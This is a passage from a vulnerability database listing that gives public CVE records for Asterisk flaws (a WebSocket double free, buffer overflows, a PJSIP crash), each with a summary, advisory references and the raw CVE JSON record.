    "datePublished": "2012-07-09T22:00:00",
    "dateReserved": "2012-06-27T00:00:00",
    "dateUpdated": "2024-08-06T20:21:02.907Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-9374

Vulnerability from cvelistv5

Published

2014-12-12 15:00

Modified

2024-08-06 13:40

Severity ?

Summary

Double free vulnerability in the WebSocket Server (res_http_websocket module) in Asterisk Open Source 11.x before 11.14.2, 12.x before 12.7.2, and 13.x before 13.0.2 and Certified Asterisk 11.6 before 11.6-cert9 allows remote attackers to cause a denial of service (crash) by sending a zero length frame after a non-zero length frame.

References

▼	URL	Tags
	http://advisories.mageia.org/MGASA-2015-0010.html	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2014-019.html	x_refsource_CONFIRM
	http://www.mandriva.com/security/advisories?name=MDVSA-2015:018	vendor-advisory, x_refsource_MANDRIVA
	http://www.securityfocus.com/archive/1/534197/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://packetstormsecurity.com/files/129473/Asterisk-Project-Security-Advisory-AST-2014-019.html	x_refsource_MISC
	http://www.securityfocus.com/bid/71607	vdb-entry, x_refsource_BID
	http://seclists.org/fulldisclosure/2014/Dec/48	mailing-list, x_refsource_FULLDISC
	http://secunia.com/advisories/60251	third-party-advisory, x_refsource_SECUNIA
	http://www.securitytracker.com/id/1031345	vdb-entry, x_refsource_SECTRACK

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:40:25.047Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://advisories.mageia.org/MGASA-2015-0010.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-019.html"
          },
          {
            "name": "MDVSA-2015:018",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:018"
          },
          {
            "name": "20141210 AST-2014-019: Remote Crash Vulnerability in WebSocket Server",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/534197/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/129473/Asterisk-Project-Security-Advisory-AST-2014-019.html"
          },
          {
            "name": "71607",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/71607"
          },
          {
            "name": "20141210 AST-2014-019: Remote Crash Vulnerability in WebSocket Server",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2014/Dec/48"
          },
          {
            "name": "60251",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/60251"
          },
          {
            "name": "1031345",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1031345"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-12-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Double free vulnerability in the WebSocket Server (res_http_websocket module) in Asterisk Open Source 11.x before 11.14.2, 12.x before 12.7.2, and 13.x before 13.0.2 and Certified Asterisk 11.6 before 11.6-cert9 allows remote attackers to cause a denial of service (crash) by sending a zero length frame after a non-zero length frame."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://advisories.mageia.org/MGASA-2015-0010.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-019.html"
        },
        {
          "name": "MDVSA-2015:018",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:018"
        },
        {
          "name": "20141210 AST-2014-019: Remote Crash Vulnerability in WebSocket Server",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/534197/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/129473/Asterisk-Project-Security-Advisory-AST-2014-019.html"
        },
        {
          "name": "71607",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/71607"
        },
        {
          "name": "20141210 AST-2014-019: Remote Crash Vulnerability in WebSocket Server",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2014/Dec/48"
        },
        {
          "name": "60251",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/60251"
        },
        {
          "name": "1031345",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1031345"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-9374",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Double free vulnerability in the WebSocket Server (res_http_websocket module) in Asterisk Open Source 11.x before 11.14.2, 12.x before 12.7.2, and 13.x before 13.0.2 and Certified Asterisk 11.6 before 11.6-cert9 allows remote attackers to cause a denial of service (crash) by sending a zero length frame after a non-zero length frame."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://advisories.mageia.org/MGASA-2015-0010.html",
              "refsource": "CONFIRM",
              "url": "http://advisories.mageia.org/MGASA-2015-0010.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-019.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-019.html"
            },
            {
              "name": "MDVSA-2015:018",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:018"
            },
            {
              "name": "20141210 AST-2014-019: Remote Crash Vulnerability in WebSocket Server",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/534197/100/0/threaded"
            },
            {
              "name": "http://packetstormsecurity.com/files/129473/Asterisk-Project-Security-Advisory-AST-2014-019.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/129473/Asterisk-Project-Security-Advisory-AST-2014-019.html"
            },
            {
              "name": "71607",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/71607"
            },
            {
              "name": "20141210 AST-2014-019: Remote Crash Vulnerability in WebSocket Server",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2014/Dec/48"
            },
            {
              "name": "60251",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/60251"
            },
            {
              "name": "1031345",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1031345"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-9374",
    "datePublished": "2014-12-12T15:00:00",
    "dateReserved": "2014-12-11T00:00:00",
    "dateUpdated": "2024-08-06T13:40:25.047Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-16671

Vulnerability from cvelistv5

Published

2017-11-09 00:00

Modified

2024-08-05 20:35

Severity ?

Summary

A Buffer Overflow issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. No size checking is done when setting the user field for Party B on a CDR. Thus, it is possible for someone to use an arbitrarily large string and write past the end of the user field storage buffer. NOTE: this is different from CVE-2017-7617, which was only about the Party A buffer.

References

▼	URL	Tags
	http://www.securityfocus.com/bid/101760	vdb-entry, x_refsource_BID
	http://downloads.digium.com/pub/security/AST-2017-010.html	x_refsource_CONFIRM
	https://security.gentoo.org/glsa/201811-11	vendor-advisory, x_refsource_GENTOO
	https://www.debian.org/security/2017/dsa-4076	vendor-advisory, x_refsource_DEBIAN
	https://issues.asterisk.org/jira/browse/ASTERISK-27337	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T20:35:19.933Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "101760",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/101760"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2017-010.html"
          },
          {
            "name": "GLSA-201811-11",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/201811-11"
          },
          {
            "name": "DSA-4076",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2017/dsa-4076"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27337"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-11-08T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A Buffer Overflow issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. No size checking is done when setting the user field for Party B on a CDR. Thus, it is possible for someone to use an arbitrarily large string and write past the end of the user field storage buffer. NOTE: this is different from CVE-2017-7617, which was only about the Party A buffer."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-11-25T10:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "101760",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/101760"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2017-010.html"
        },
        {
          "name": "GLSA-201811-11",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "https://security.gentoo.org/glsa/201811-11"
        },
        {
          "name": "DSA-4076",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2017/dsa-4076"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27337"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-16671",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A Buffer Overflow issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. No size checking is done when setting the user field for Party B on a CDR. Thus, it is possible for someone to use an arbitrarily large string and write past the end of the user field storage buffer. NOTE: this is different from CVE-2017-7617, which was only about the Party A buffer."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "101760",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/101760"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2017-010.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2017-010.html"
            },
            {
              "name": "GLSA-201811-11",
              "refsource": "GENTOO",
              "url": "https://security.gentoo.org/glsa/201811-11"
            },
            {
              "name": "DSA-4076",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2017/dsa-4076"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27337",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27337"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-16671",
    "datePublished": "2017-11-09T00:00:00",
    "dateReserved": "2017-11-08T00:00:00",
    "dateUpdated": "2024-08-05T20:35:19.933Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-0495

Vulnerability from cvelistv5

Published

2011-01-20 18:00

Modified

2024-08-06 21:58

Severity ?

Summary

Stack-based buffer overflow in the ast_uri_encode function in main/utils.c in Asterisk Open Source before 1.4.38.1, 1.4.39.1, 1.6.1.21, 1.6.2.15.1, 1.6.2.16.1, 1.8.1.2, 1.8.2.; and Business Edition before C.3.6.2; when running in pedantic mode allows remote authenticated users to execute arbitrary code via crafted caller ID data in vectors involving the (1) SIP channel driver, (2) URIENCODE dialplan function, or (3) AGI dialplan function.

References

▼	URL	Tags
	http://www.vupen.com/english/advisories/2011/0159	vdb-entry, x_refsource_VUPEN
	http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053713.html	vendor-advisory, x_refsource_FEDORA
	http://downloads.asterisk.org/pub/security/AST-2011-001.html	x_refsource_CONFIRM
	http://secunia.com/advisories/43373	third-party-advisory, x_refsource_SECUNIA
	http://www.vupen.com/english/advisories/2011/0449	vdb-entry, x_refsource_VUPEN
	http://osvdb.org/70518	vdb-entry, x_refsource_OSVDB
	http://www.securityfocus.com/bid/45839	vdb-entry, x_refsource_BID
	http://www.vupen.com/english/advisories/2011/0281	vdb-entry, x_refsource_VUPEN
	http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053689.html	vendor-advisory, x_refsource_FEDORA
	http://www.debian.org/security/2011/dsa-2171	vendor-advisory, x_refsource_DEBIAN
	http://secunia.com/advisories/43119	third-party-advisory, x_refsource_SECUNIA
	https://exchange.xforce.ibmcloud.com/vulnerabilities/64831	vdb-entry, x_refsource_XF
	http://downloads.asterisk.org/pub/security/AST-2011-001-1.6.2.diff	x_refsource_MISC
	http://www.securityfocus.com/archive/1/515781/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://secunia.com/advisories/42935	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T21:58:24.451Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2011-0159",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/0159"
          },
          {
            "name": "FEDORA-2011-0794",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053713.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-001.html"
          },
          {
            "name": "43373",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/43373"
          },
          {
            "name": "ADV-2011-0449",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/0449"
          },
          {
            "name": "70518",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/70518"
          },
          {
            "name": "45839",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/45839"
          },
          {
            "name": "ADV-2011-0281",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/0281"
          },
          {
            "name": "FEDORA-2011-0774",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053689.html"
          },
          {
            "name": "DSA-2171",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2171"
          },
          {
            "name": "43119",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/43119"
          },
          {
            "name": "asterisk-asturiencode-bo(64831)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64831"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-001-1.6.2.diff"
          },
          {
            "name": "20110118 AST-2011-001: Stack buffer overflow in SIP channel driver",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/515781/100/0/threaded"
          },
          {
            "name": "42935",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/42935"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-01-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Stack-based buffer overflow in the ast_uri_encode function in main/utils.c in Asterisk Open Source before 1.4.38.1, 1.4.39.1, 1.6.1.21, 1.6.2.15.1, 1.6.2.16.1, 1.8.1.2, 1.8.2.; and Business Edition before C.3.6.2; when running in pedantic mode allows remote authenticated users to execute arbitrary code via crafted caller ID data in vectors involving the (1) SIP channel driver, (2) URIENCODE dialplan function, or (3) AGI dialplan function."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "ADV-2011-0159",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/0159"
        },
        {
          "name": "FEDORA-2011-0794",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053713.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-001.html"
        },
        {
          "name": "43373",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/43373"
        },
        {
          "name": "ADV-2011-0449",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/0449"
        },
        {
          "name": "70518",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/70518"
        },
        {
          "name": "45839",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/45839"
        },
        {
          "name": "ADV-2011-0281",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/0281"
        },
        {
          "name": "FEDORA-2011-0774",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053689.html"
        },
        {
          "name": "DSA-2171",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2171"
        },
        {
          "name": "43119",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/43119"
        },
        {
          "name": "asterisk-asturiencode-bo(64831)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64831"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-001-1.6.2.diff"
        },
        {
          "name": "20110118 AST-2011-001: Stack buffer overflow in SIP channel driver",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/515781/100/0/threaded"
        },
        {
          "name": "42935",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/42935"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-0495",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Stack-based buffer overflow in the ast_uri_encode function in main/utils.c in Asterisk Open Source before 1.4.38.1, 1.4.39.1, 1.6.1.21, 1.6.2.15.1, 1.6.2.16.1, 1.8.1.2, 1.8.2.; and Business Edition before C.3.6.2; when running in pedantic mode allows remote authenticated users to execute arbitrary code via crafted caller ID data in vectors involving the (1) SIP channel driver, (2) URIENCODE dialplan function, or (3) AGI dialplan function."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ADV-2011-0159",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2011/0159"
            },
            {
              "name": "FEDORA-2011-0794",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053713.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-001.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-001.html"
            },
            {
              "name": "43373",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/43373"
            },
            {
              "name": "ADV-2011-0449",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2011/0449"
            },
            {
              "name": "70518",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/70518"
            },
            {
              "name": "45839",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/45839"
            },
            {
              "name": "ADV-2011-0281",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2011/0281"
            },
            {
              "name": "FEDORA-2011-0774",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053689.html"
            },
            {
              "name": "DSA-2171",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2011/dsa-2171"
            },
            {
              "name": "43119",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/43119"
            },
            {
              "name": "asterisk-asturiencode-bo(64831)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64831"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-001-1.6.2.diff",
              "refsource": "MISC",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-001-1.6.2.diff"
            },
            {
              "name": "20110118 AST-2011-001: Stack buffer overflow in SIP channel driver",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/515781/100/0/threaded"
            },
            {
              "name": "42935",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/42935"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-0495",
    "datePublished": "2011-01-20T18:00:00",
    "dateReserved": "2011-01-19T00:00:00",
    "dateUpdated": "2024-08-06T21:58:24.451Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-4045

Vulnerability from cvelistv5

Published

2014-06-17 14:00

Modified

2024-08-06 11:04

Severity ?

Summary

The Publish/Subscribe Framework in the PJSIP channel driver in Asterisk Open Source 12.x before 12.3.1, when sub_min_expiry is set to zero, allows remote attackers to cause a denial of service (assertion failure and crash) via an unsubscribe request when not subscribed to the device.

References

▼	URL	Tags
	http://www.securityfocus.com/archive/1/532414/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://packetstormsecurity.com/files/127087/Asterisk-Project-Security-Advisory-AST-2014-005.html	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2014-005.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T11:04:28.408Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20140612 AST-2014-005: Remote Crash in PJSIP Channel Driver\u0027s Publish/Subscribe Framework",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/532414/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/127087/Asterisk-Project-Security-Advisory-AST-2014-005.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-005.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-06-12T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The Publish/Subscribe Framework in the PJSIP channel driver in Asterisk Open Source 12.x before 12.3.1, when sub_min_expiry is set to zero, allows remote attackers to cause a denial of service (assertion failure and crash) via an unsubscribe request when not subscribed to the device."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20140612 AST-2014-005: Remote Crash in PJSIP Channel Driver\u0027s Publish/Subscribe Framework",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/532414/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/127087/Asterisk-Project-Security-Advisory-AST-2014-005.html"
        },
        {
